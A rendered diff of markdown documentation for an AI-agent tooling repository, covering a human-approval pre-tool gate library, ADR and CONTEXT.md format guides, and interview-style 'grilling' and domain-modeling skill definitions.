**This library does not write the ledger.** Nothing in `src/` reads or writes `approvals`; `verifyGoGate` and `checkPreToolGate` are pure functions that return a `GateCheckResult` (`allowed`, `status`, `reason`, `lastHumanToken`) and touch no state file. The format below is the convention a caller is expected to append to `production_artifacts/state.json` after acting on an `allowed: true` result:
|
|
116
|
+
|
|
117
|
+
```json
|
|
118
|
+
{
|
|
119
|
+
"run_id": "run-2026-09-05-01",
|
|
120
|
+
"phase": "ship",
|
|
121
|
+
"approvals": [
|
|
122
|
+
{
|
|
123
|
+
"node": "shipping",
|
|
124
|
+
"token": "GO",
|
|
125
|
+
"timestamp": "2026-09-05T14:48:22.105Z",
|
|
126
|
+
"action": "git push origin main"
|
|
127
|
+
}
|
|
128
|
+
]
|
|
129
|
+
}
|
|
130
|
+
```
|
|
131
|
+
|
|
132
|
+
---
|
|
133
|
+
|
|
134
|
+
## 6. TypeScript API Usage Example
|
|
135
|
+
|
|
136
|
+
```typescript
|
|
137
|
+
import { verifyGoGate, checkPreToolGate } from 'bdb-cicd-resilience/triage/index.js';
|
|
138
|
+
|
|
139
|
+
// PreTool Hook Implementation
|
|
140
|
+
async function onPreToolUse(command: string, transcriptPath: string) {
|
|
141
|
+
const result = checkPreToolGate(command, transcriptPath);
|
|
142
|
+
|
|
143
|
+
if (!result.allowed) {
|
|
144
|
+
console.error(`🛑 PRE-TOOL GATE BLOCKED: ${result.reason}`);
|
|
145
|
+
console.error('Antworte mit GO, um die Ausführung zu starten.');
|
|
146
|
+
process.exit(2);
|
|
147
|
+
}
|
|
148
|
+
|
|
149
|
+
console.log(`✅ Pre-tool gate verified (${result.lastHumanToken}). Proceeding with command: ${command}`);
|
|
150
|
+
}
|
|
151
|
+
```
|
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
# ADR Format
|
|
2
|
+
|
|
3
|
+
ADRs live in `docs/adr/` and use sequential numbering: `0001-slug.md`, `0002-slug.md`, etc.
|
|
4
|
+
|
|
5
|
+
Create the `docs/adr/` directory lazily: only when the first ADR is needed.
|
|
6
|
+
|
|
7
|
+
## Template
|
|
8
|
+
|
|
9
|
+
```md
|
|
10
|
+
# {Short title of the decision}
|
|
11
|
+
|
|
12
|
+
{1-3 sentences: what's the context, what did we decide, and why.}
|
|
13
|
+
```
|
|
14
|
+
|
|
15
|
+
That's it. An ADR can be a single paragraph. The value is in recording *that* a decision was made and *why*, not in filling out sections.
|
|
16
|
+
|
|
17
|
+
## Optional sections
|
|
18
|
+
|
|
19
|
+
Only include these when they add genuine value. Most ADRs won't need them.
|
|
20
|
+
|
|
21
|
+
- **Status** frontmatter (`proposed | accepted | deprecated | superseded by ADR-NNNN`): useful when decisions are revisited
|
|
22
|
+
- **Considered Options**: only when the rejected alternatives are worth remembering
|
|
23
|
+
- **Consequences**: only when non-obvious downstream effects need to be called out
|
|
24
|
+
|
|
25
|
+
## Numbering
|
|
26
|
+
|
|
27
|
+
Scan `docs/adr/` for the highest existing number and increment by one.
|
|
28
|
+
|
|
29
|
+
## When to offer an ADR
|
|
30
|
+
|
|
31
|
+
All three of these must be true:
|
|
32
|
+
|
|
33
|
+
1. **Hard to reverse**: the cost of changing your mind later is meaningful
|
|
34
|
+
2. **Surprising without context**: a future reader will look at the code and wonder "why on earth did they do it this way?"
|
|
35
|
+
3. **The result of a real trade-off**: there were genuine alternatives and you picked one for specific reasons
|
|
36
|
+
|
|
37
|
+
If a decision is easy to reverse, skip it: you'll just reverse it. If it's not surprising, nobody will wonder why. If there was no real alternative, there's nothing to record beyond "we did the obvious thing."
|
|
38
|
+
|
|
39
|
+
### What qualifies
|
|
40
|
+
|
|
41
|
+
- **Architectural shape.** "We're using a monorepo." "The write model is event-sourced, the read model is projected into Postgres."
|
|
42
|
+
- **Integration patterns between contexts.** "Ordering and Billing communicate via domain events, not synchronous HTTP."
|
|
43
|
+
- **Technology choices that carry lock-in.** Database, message bus, auth provider, deployment target. Not every library: just the ones that would take a quarter to swap out.
|
|
44
|
+
- **Boundary and scope decisions.** "Customer data is owned by the Customer context; other contexts reference it by ID only." The explicit no-s are as valuable as the yes-s.
|
|
45
|
+
- **Deliberate deviations from the obvious path.** "We're using manual SQL instead of an ORM because X." Anything where a reasonable reader would assume the opposite. These stop the next engineer from "fixing" something that was deliberate.
|
|
46
|
+
- **Constraints not visible in the code.** "We can't use AWS because of compliance requirements." "Response times must be under 200ms because of the partner API contract."
|
|
47
|
+
- **Rejected alternatives when the rejection is non-obvious.** If you considered GraphQL and picked REST for subtle reasons, record it; otherwise someone will suggest GraphQL again in six months.
|
|
@@ -0,0 +1,60 @@
|
|
|
1
|
+
# CONTEXT.md Format
|
|
2
|
+
|
|
3
|
+
## Structure
|
|
4
|
+
|
|
5
|
+
```md
|
|
6
|
+
# {Context Name}
|
|
7
|
+
|
|
8
|
+
{One or two sentence description of what this context is and why it exists.}
|
|
9
|
+
|
|
10
|
+
## Language
|
|
11
|
+
|
|
12
|
+
**Order**:
|
|
13
|
+
{A one or two sentence description of the term}
|
|
14
|
+
_Avoid_: Purchase, transaction
|
|
15
|
+
|
|
16
|
+
**Invoice**:
|
|
17
|
+
A request for payment sent to a customer after delivery.
|
|
18
|
+
_Avoid_: Bill, payment request
|
|
19
|
+
|
|
20
|
+
**Customer**:
|
|
21
|
+
A person or organization that places orders.
|
|
22
|
+
_Avoid_: Client, buyer, account
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
## Rules
|
|
26
|
+
|
|
27
|
+
- **Be opinionated.** When multiple words exist for the same concept, pick the best one and list the others under `_Avoid_`.
|
|
28
|
+
- **Keep definitions tight.** One or two sentences max. Define what it IS, not what it does.
|
|
29
|
+
- **Only include terms specific to this project's context.** General programming concepts (timeouts, error types, utility patterns) don't belong even if the project uses them extensively. Before adding a term, ask: is this a concept unique to this context, or a general programming concept? Only the former belongs.
|
|
30
|
+
- **Group terms under subheadings** when natural clusters emerge. If all terms belong to a single cohesive area, a flat list is fine.
|
|
31
|
+
|
|
32
|
+
## Single vs multi-context repos
|
|
33
|
+
|
|
34
|
+
**Single context (most repos):** One `CONTEXT.md` at the repo root.
|
|
35
|
+
|
|
36
|
+
**Multiple contexts:** A `CONTEXT-MAP.md` at the repo root lists the contexts, where they live, and how they relate to each other:
|
|
37
|
+
|
|
38
|
+
```md
|
|
39
|
+
# Context Map
|
|
40
|
+
|
|
41
|
+
## Contexts
|
|
42
|
+
|
|
43
|
+
- [Ordering](./src/ordering/CONTEXT.md): receives and tracks customer orders
|
|
44
|
+
- [Billing](./src/billing/CONTEXT.md): generates invoices and processes payments
|
|
45
|
+
- [Fulfillment](./src/fulfillment/CONTEXT.md): manages warehouse picking and shipping
|
|
46
|
+
|
|
47
|
+
## Relationships
|
|
48
|
+
|
|
49
|
+
- **Ordering → Fulfillment**: Ordering emits `OrderPlaced` events; Fulfillment consumes them to start picking
|
|
50
|
+
- **Fulfillment → Billing**: Fulfillment emits `ShipmentDispatched` events; Billing consumes them to generate invoices
|
|
51
|
+
- **Ordering ↔ Billing**: Shared types for `CustomerId` and `Money`
|
|
52
|
+
```
|
|
53
|
+
|
|
54
|
+
The skill infers which structure applies:
|
|
55
|
+
|
|
56
|
+
- If `CONTEXT-MAP.md` exists, read it to find contexts
|
|
57
|
+
- If only a root `CONTEXT.md` exists, single context
|
|
58
|
+
- If neither exists, create a root `CONTEXT.md` lazily when the first term is resolved
|
|
59
|
+
|
|
60
|
+
When multiple contexts exist, infer which one the current topic relates to. If unclear, ask.
|
|
@@ -0,0 +1,77 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: domain-modeling
|
|
3
|
+
description: Build and sharpen a project's domain model. Use when discussing codebase terminology, writing or editing a CONTEXT.md, or recording or editing an ADR.
|
|
4
|
+
category: engineering-method
|
|
5
|
+
---
|
|
6
|
+
|
|
7
|
+
<!-- Source: mattpocock/skills skills/engineering/domain-modeling — MIT, see THIRD_PARTY_NOTICES.md -->
|
|
8
|
+
|
|
9
|
+
# Domain Modeling
|
|
10
|
+
|
|
11
|
+
Actively build and sharpen the project's domain model as you design. This is the *active* discipline: challenging terms, inventing edge-case scenarios, and writing the glossary and decisions down the moment they crystallise. (Merely *reading* `CONTEXT.md` for vocabulary is not this skill: that's a one-line habit any skill can do. This skill is for when you're changing the model, not just consuming it.)
|
|
12
|
+
|
|
13
|
+
## File structure
|
|
14
|
+
|
|
15
|
+
Most repos have a single context:
|
|
16
|
+
|
|
17
|
+
```
|
|
18
|
+
/
|
|
19
|
+
├── CONTEXT.md
|
|
20
|
+
├── docs/
|
|
21
|
+
│ └── adr/
|
|
22
|
+
│ ├── 0001-event-sourced-orders.md
|
|
23
|
+
│ └── 0002-postgres-for-write-model.md
|
|
24
|
+
└── src/
|
|
25
|
+
```
|
|
26
|
+
|
|
27
|
+
If a `CONTEXT-MAP.md` exists at the root, the repo has multiple contexts. The map points to where each one lives:
|
|
28
|
+
|
|
29
|
+
```
|
|
30
|
+
/
|
|
31
|
+
├── CONTEXT-MAP.md
|
|
32
|
+
├── docs/
|
|
33
|
+
│ └── adr/ ← system-wide decisions
|
|
34
|
+
├── src/
|
|
35
|
+
│ ├── ordering/
|
|
36
|
+
│ │ ├── CONTEXT.md
|
|
37
|
+
│ │ └── docs/adr/ ← context-specific decisions
|
|
38
|
+
│ └── billing/
|
|
39
|
+
│ ├── CONTEXT.md
|
|
40
|
+
│ └── docs/adr/
|
|
41
|
+
```
|
|
42
|
+
|
|
43
|
+
Create files lazily: only when you have something to write. If no `CONTEXT.md` exists, create one when the first term is resolved. If no `docs/adr/` exists, create it when the first ADR is needed.
|
|
44
|
+
|
|
45
|
+
## During the session
|
|
46
|
+
|
|
47
|
+
### Challenge against the glossary
|
|
48
|
+
|
|
49
|
+
When the user uses a term that conflicts with the existing language in `CONTEXT.md`, call it out immediately. "Your glossary defines 'cancellation' as X, but you seem to mean Y. Which is it?"
|
|
50
|
+
|
|
51
|
+
### Sharpen fuzzy language
|
|
52
|
+
|
|
53
|
+
When the user uses vague or overloaded terms, propose a precise canonical term. "You're saying 'account': do you mean the Customer or the User? Those are different things."
|
|
54
|
+
|
|
55
|
+
### Discuss concrete scenarios
|
|
56
|
+
|
|
57
|
+
When domain relationships are being discussed, stress-test them with specific scenarios. Invent scenarios that probe edge cases and force the user to be precise about the boundaries between concepts.
|
|
58
|
+
|
|
59
|
+
### Cross-reference with code
|
|
60
|
+
|
|
61
|
+
When the user states how something works, check whether the code agrees. If you find a contradiction, surface it: "Your code cancels entire Orders, but you just said partial cancellation is possible. Which is right?"
|
|
62
|
+
|
|
63
|
+
### Update CONTEXT.md inline
|
|
64
|
+
|
|
65
|
+
When a term is resolved, update `CONTEXT.md` right there. Don't batch these up: capture them as they happen. Use the format in [CONTEXT-FORMAT.md](./CONTEXT-FORMAT.md).
|
|
66
|
+
|
|
67
|
+
`CONTEXT.md` should be totally devoid of implementation details. Do not treat `CONTEXT.md` as a spec, a scratch pad, or a repository for implementation decisions. It is a glossary and nothing else.
|
|
68
|
+
|
|
69
|
+
### Offer ADRs sparingly
|
|
70
|
+
|
|
71
|
+
Only offer to create an ADR when all three are true:
|
|
72
|
+
|
|
73
|
+
1. **Hard to reverse**: the cost of changing your mind later is meaningful
|
|
74
|
+
2. **Surprising without context**: a future reader will wonder "why did they do it this way?"
|
|
75
|
+
3. **The result of a real trade-off**: there were genuine alternatives and you picked one for specific reasons
|
|
76
|
+
|
|
77
|
+
If any of the three is missing, skip the ADR. Use the format in [ADR-FORMAT.md](./ADR-FORMAT.md).
|
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: grill-me
|
|
3
|
+
description: A relentless interview to sharpen a plan or design. Use before committing to an approach, or on any 'grill me' trigger phrase.
|
|
4
|
+
category: engineering-method
|
|
5
|
+
disable-model-invocation: true
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
<!-- Source: mattpocock/skills skills/productivity/grill-me — MIT, see THIRD_PARTY_NOTICES.md -->
|
|
9
|
+
|
|
10
|
+
Invoke the `grilling` skill and follow it.
|
|
11
|
+
|
|
12
|
+
That skill is the whole interview: design tree, frontier rounds, numbered questions with a recommended answer each. Nothing is restated here — a second copy would drift from the first.
|
|
13
|
+
|
|
14
|
+
**Use `grill-with-docs` instead whenever there is a working directory.** Same interview, but it also runs `domain-modeling`, so terminology and decisions land in `CONTEXT.md` and ADRs as they are settled rather than evaporating with the session. Reach for this one when there is no repo to write to, or when the outcome is a decision rather than a document.
|
|
@@ -0,0 +1,24 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: grill-with-docs
|
|
3
|
+
description: A relentless interview to sharpen a plan or design, which also builds the project's domain model — glossary and ADRs — as it goes. Use in a working directory whenever an idea needs sharpening.
|
|
4
|
+
category: engineering-method
|
|
5
|
+
disable-model-invocation: true
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
<!-- Source: mattpocock/skills skills/engineering/grill-with-docs — MIT, see THIRD_PARTY_NOTICES.md -->
|
|
9
|
+
|
|
10
|
+
Invoke two skills and run them together: `grilling` and `domain-modeling`.
|
|
11
|
+
|
|
12
|
+
Neither is restated here. `grilling` supplies the interview — design tree, frontier rounds, numbered questions with a recommended answer each. `domain-modeling` supplies the discipline that runs underneath it: challenging terms against the glossary, sharpening fuzzy language, stress-testing relationships with concrete scenarios, and writing what is settled into `CONTEXT.md` and `docs/adr/` **as it crystallises**, not batched at the end.
|
|
13
|
+
|
|
14
|
+
**Prefer this over `grill-me` whenever there is a repo to leave a trail in.** The interview is identical; the difference is whether the shared understanding survives the session. Use `grill-me` when there is no working directory, or when the outcome is a decision rather than a document.
|
|
15
|
+
|
|
16
|
+
## Handing off
|
|
17
|
+
|
|
18
|
+
Grilling produces a shared understanding, not an execution plan. When the frontier is empty, pick the pipeline the work actually needs:
|
|
19
|
+
|
|
20
|
+
- `/startcycle` — a straight run with file hand-offs; the usual choice
|
|
21
|
+
- `/startcycle-graph` — when the durable `state.json`, the Reviewer repair loop and human escalation earn their overhead
|
|
22
|
+
- `/startcycle-graph-user` — a throwaway 2–4 node fan-out, nothing persistent left behind
|
|
23
|
+
|
|
24
|
+
`/bdbrainstorm` and `/bdbmediastorm` run this interview as their own first step; do not run it twice.
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: grilling
|
|
3
|
+
description: Grill the user relentlessly about a plan, decision, or idea. Use when the user wants to stress-test their thinking, or uses any 'grill' trigger phrases.
|
|
4
|
+
category: engineering-method
|
|
5
|
+
---
|
|
6
|
+
|
|
7
|
+
<!-- Source: mattpocock/skills skills/productivity/grilling — MIT, see THIRD_PARTY_NOTICES.md -->
|
|
8
|
+
|
|
9
|
+
Interview the user relentlessly until you reach a shared understanding. Map this as a **design tree**: every decision branches into the decisions that hang off it.
|
|
10
|
+
|
|
11
|
+
Work the tree in **rounds**. The **frontier** is every decision whose prerequisites are already settled: the questions you can ask _now_ without guessing at answers you haven't heard yet. Ask the whole frontier in one round: number each question and give your recommended answer. Then wait for the user's answers before the next round.
|
|
12
|
+
|
|
13
|
+
Format a round like so:
|
|
14
|
+
|
|
15
|
+
```
|
|
16
|
+
❓ **Q1** - **<question title>**: <question body, might be multiple paragraphs, including multiple choices>
|
|
17
|
+
|
|
18
|
+
➡️ <your recommended answer>
|
|
19
|
+
|
|
20
|
+
---
|
|
21
|
+
|
|
22
|
+
❓ **Q2** - **<question title>**: <question body, might be multiple paragraphs, including multiple choices>
|
|
23
|
+
|
|
24
|
+
➡️ <your recommended answer>
|
|
25
|
+
```
|
|
26
|
+
|
|
27
|
+
Each round the user answers reshapes the tree: settled decisions push the frontier outward and unblock questions that depended on them. Recompute the frontier and ask the next round. A question whose answer depends on another question still open in this round belongs to a _later_ round, not this one.
|
|
28
|
+
|
|
29
|
+
Finding _facts_ is your job, never the user's. When a frontier question needs a fact from the environment (filesystem, tools, etc.), dispatch a sub-agent to find it; don't ask the user for anything you could look up yourself. Don't block on it: a running exploration is an unsettled prerequisite, so only the questions downstream of it wait for the sub-agent to report; ask the rest of the frontier now. The _decisions_ are the user's: put each to them and wait.
|
|
30
|
+
|
|
31
|
+
The session is done when the frontier is empty: every branch of the design tree visited, nothing left silently assumed. Do not act on it until the user confirms you have reached a shared understanding.
|
|
32
|
+
|
|
33
|
+
## In AOS
|
|
34
|
+
|
|
35
|
+
This is the primitive. Two skills compose it, and neither duplicates it:
|
|
36
|
+
|
|
37
|
+
- **`grill-me`** — the interview alone. Use without a working directory, or when the output is a decision rather than a document.
|
|
38
|
+
- **`grill-with-docs`** — the interview plus `domain-modeling`, leaving a paper trail. Prefer it whenever there is a repo to leave one in.
|
|
39
|
+
|
|
40
|
+
Grilling produces a shared understanding, not a plan. Once the frontier is empty, hand off to whichever pipeline the work actually needs — `/startcycle` for a straight run, `/startcycle-graph` when the durable record and repair loop earn their overhead, `/startcycle-graph-user` for a throwaway fan-out. `/bdbrainstorm` and `/bdbmediastorm` invoke this skill as their own interview step rather than restating it.
|
|
41
|
+
|
|
42
|
+
**Do not use the `AskUserQuestion` tool for a grilling round.** A round is numbered questions with recommended answers, answered in prose, in whatever order the user likes — several at once, or one with a correction to another. Forcing that into fixed-choice widgets loses exactly the nuance the interview exists to surface.
|